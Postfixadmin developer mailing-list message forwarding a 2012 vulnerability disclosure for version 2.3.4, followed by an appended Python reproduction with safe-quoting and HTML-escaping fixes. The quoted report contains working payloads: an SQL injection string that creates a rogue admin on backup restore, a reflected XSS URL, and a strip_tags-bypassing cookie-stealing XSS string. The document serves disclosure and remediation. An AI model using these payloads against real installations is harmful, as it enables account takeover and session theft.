[Postfixadmin-devel] Fwd: Vulnerabilities in postfixadmin 2.3.4
From: David G. <da...@co...> - 2012-01-10 16:11:00
Hi,

I've fixed the problems in backup.php, edit-vacation.php (and template/smenu.php) and functions.inc.php.

Can you confirm/test my changes please?

thanks

David.

Begin forwarded message:

> From: Filippo Cavallarin <no...@so...>
> Subject: Vulnerabilities in postfixadmin 2.3.4
> Date: 10 January 2012 15:22:09 GMT
> To: GingerDog <gin...@us...>
>
> Hello,
> I would like to inform you about some vulnerabilities I discovered in postfixadmin 2.3.4.
>
> 1) SQL injection in pacrypt function: if postfixadmin is configured with 'mysql_encrypt' the
> pacrypt function passes the $pw parameter to the sql query without sanitizing it, allowing non-
> admin users to perform sql injection attacks.
>
> 2) SQL injection in sql dump generated by backup.php: the backup.php file generates sql
> queries without sanitizing values. A non-admin user can inject arbitrary sql commands
> into the backup file that will be executed when an admin restores that backup. To test this
> issue try to set the vacation message of any user to:
>
> dontcare','','dominio.com','2012-01-09 17:34:06','1');
> INSERT INTO admin (username,password,created,modified,active)
> VALUES ('so...@em...','$1$2cab7a19$zIuOsr6PXksCu13883fVg/','2012-01-08
> 15:48:19','2012-01-09 17:17:55','1'); #
>
> then take a backup and restore it; the new admin so...@em... is added to the admin
> table.
>
> 3) Multiple XSS and lack of CSRF protection: I found several XSS in postfixadmin code. I
> noted from the postfixadmin homepage that you planned to merge it with Smarty, which could
> provide good protection against XSS and CSRF. BTW I report some of them to you:
>
> Input passed via the domain GET parameter to edit-vacation.php is not properly sanitised
> before being returned to the user.
> http://127.0.0.1/postfixadmin-2.3.4/edit-vacation.php?domain=dontcare</script><script>alert(1);</script>
>
> Input passed via the fDomain POST parameter to create-domain.php is not properly
> sanitised before being returned to the user.
> This is interesting because the fDomain variable is passed to strip_tags, so something like
> on<a>click is transformed to onclick. This allows bypassing browsers' built-in XSS protection.
> To test this issue put the following string as the Domain parameter in create-domain.php,
> submit the form and then click on the Domain's input text..
>
> dontcare" oncli<a>ck=alert(document.cookie);//
>
> Best,
>
> Filippo Cavallarin
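The two mechanisms in points 2) and 3) of the report, reproduced as an added example that is not postfixadmin code and not part of the thread. The vacation and admin tables are a constructed SQLite model (column order follows what the report's vacation payload relies on), the admin username and password hash in the payload are placeholders, and the MySQL `#` comment in the report's payload is replaced by the standard `--` so SQLite can run the restored dump. The strip_tags() here is a minimal re-implementation of PHP's, used to show why it is not an output encoder; `dump_rows_unsafe`, `dump_rows_safe`, `render_unsafe` and `render_safe` are hypothetical names, not functions from backup.php or create-domain.php.

```python
import html
import re
import sqlite3

# Constructed model of the two tables the report names (not the real schema).
SCHEMA = """
CREATE TABLE vacation (email TEXT, subject TEXT, body TEXT, cache TEXT,
                       domain TEXT, created TEXT, active TEXT);
CREATE TABLE admin (username TEXT, password TEXT, created TEXT,
                    modified TEXT, active TEXT);
"""
VACATION_COLS = ("email", "subject", "body", "cache", "domain", "created", "active")

# The report's vacation-message payload; '#' swapped for '--' (SQLite has no
# '#' comments), admin name and hash are placeholders.
VACATION_PAYLOAD = (
    "dontcare','','dominio.com','2012-01-09 17:34:06','1'); "
    "INSERT INTO admin (username,password,created,modified,active) "
    "VALUES ('attacker@example.com','$1$placeholder$hash',"
    "'2012-01-08 15:48:19','2012-01-09 17:17:55','1'); -- "
)

# One constructed vacation row; the attacker-controlled body is column 3.
VACATION_ROWS = [
    ("victim@dominio.com", "Out of office", VACATION_PAYLOAD, "",
     "dominio.com", "2012-01-09 17:34:06", "1"),
]


def dump_rows_unsafe(table, columns, rows):
    """Model of the faulty dump: values are quoted but never escaped, so a
    quote inside a value closes the literal and the rest is parsed as SQL."""
    out = []
    for row in rows:
        values = ",".join("'%s'" % v for v in row)
        out.append("INSERT INTO %s (%s) VALUES (%s);" % (table, ",".join(columns), values))
    return "\n".join(out)


def sql_quote(value):
    """Quote a literal for SQLite by doubling embedded quotes. For MySQL the
    backslash must be escaped too (or use the driver's quoting), since MySQL
    treats backslash as an escape character by default."""
    return "'" + str(value).replace("'", "''") + "'"


def dump_rows_safe(table, columns, rows):
    """Same dump, every value passed through sql_quote()."""
    out = []
    for row in rows:
        values = ",".join(sql_quote(v) for v in row)
        out.append("INSERT INTO %s (%s) VALUES (%s);" % (table, ",".join(columns), values))
    return "\n".join(out)


def restore(dump):
    """What the admin's restore does: run the dump against a fresh database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executescript(dump)
    return conn


def admin_count(dump):
    """Admin rows after restoring a dump: 0 unless the dump was injected."""
    return restore(dump).execute("SELECT COUNT(*) FROM admin").fetchone()[0]


def restored_body(dump):
    """The vacation body after the round trip through dump and restore."""
    return restore(dump).execute("SELECT body FROM vacation").fetchone()[0]


# --- XSS: strip_tags() is not an output encoder ---------------------------
TAG_RE = re.compile(r"<[^>]*>")
XSS_PAYLOAD = 'dontcare" oncli<a>ck=alert(document.cookie);//'


def strip_tags(s):
    """Minimal model of PHP strip_tags(): delete anything shaped like a tag.
    Quotes are untouched, and removing '<a>' from 'oncli<a>ck' glues the
    attribute name back together."""
    return TAG_RE.sub("", s)


def render_unsafe(domain):
    """Echo the submitted domain into the form field after strip_tags() only."""
    return '<input type="text" name="fDomain" value="%s">' % strip_tags(domain)


def render_safe(domain):
    """Attribute-context encoding: quotes and angle brackets become entities."""
    return '<input type="text" name="fDomain" value="%s">' % html.escape(domain, quote=True)


if __name__ == "__main__":
    print("admins after unsafe restore:", admin_count(dump_rows_unsafe("vacation", VACATION_COLS, VACATION_ROWS)))
    print("admins after safe restore:  ", admin_count(dump_rows_safe("vacation", VACATION_COLS, VACATION_ROWS)))
    print(render_unsafe(XSS_PAYLOAD))
    print(render_safe(XSS_PAYLOAD))
```

Restoring the unescaped dump executes the smuggled INSERT and adds an admin row; the escaped dump stores the payload as an ordinary string and the body round-trips intact. On the XSS side, the stripped output contains a live `onclick=` attribute while the entity-encoded output does not, which is the reason to encode for the HTML attribute context rather than strip tags.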